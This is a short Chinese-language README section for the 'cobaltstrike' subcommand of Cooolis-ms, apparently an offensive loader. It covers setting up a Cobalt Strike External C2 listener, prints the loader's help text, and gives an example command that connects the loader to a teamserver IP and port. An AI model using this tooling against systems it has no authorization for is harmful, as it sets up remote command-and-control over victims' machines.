module cobaltstrike
如果你要使用cobalstrike子命令,需要在Cobalt Strike上添加一个External C2的监听器。
Cobalt Strike的External C2提供了一个完整的流程来为其他程序实现不同协议之间的转换通信,达到兼容不同苛刻的网络环境,使得C2正常运行。
点击Cobalt Strike -> Listeners, 按下Add, 选择 External C2来添加。
注意:如果非本机测试使用,不要勾选Bind to localhost only。
[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe cobaltstrike -h
Cobalt Strike External C2 Loader
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe cobaltstrike [OPTIONS]
Options:
-h,--help Print this help message and exit
-P,--PORT UINT:INT in [1 - 65535] REQUIRED
External C2 Port
-H,--HOST TEXT:IPV4 REQUIRED
External C2 Host
一共两个参数,分别代表Teamserver的IP地址,以及External C2的端口。
命令示例:
Cooolis-ms.exe cobaltstrike -H 10.1.1.1 -P 2222
参考文档:External C2 Specification
如果你觉得这个项目不错,请给我一个Star~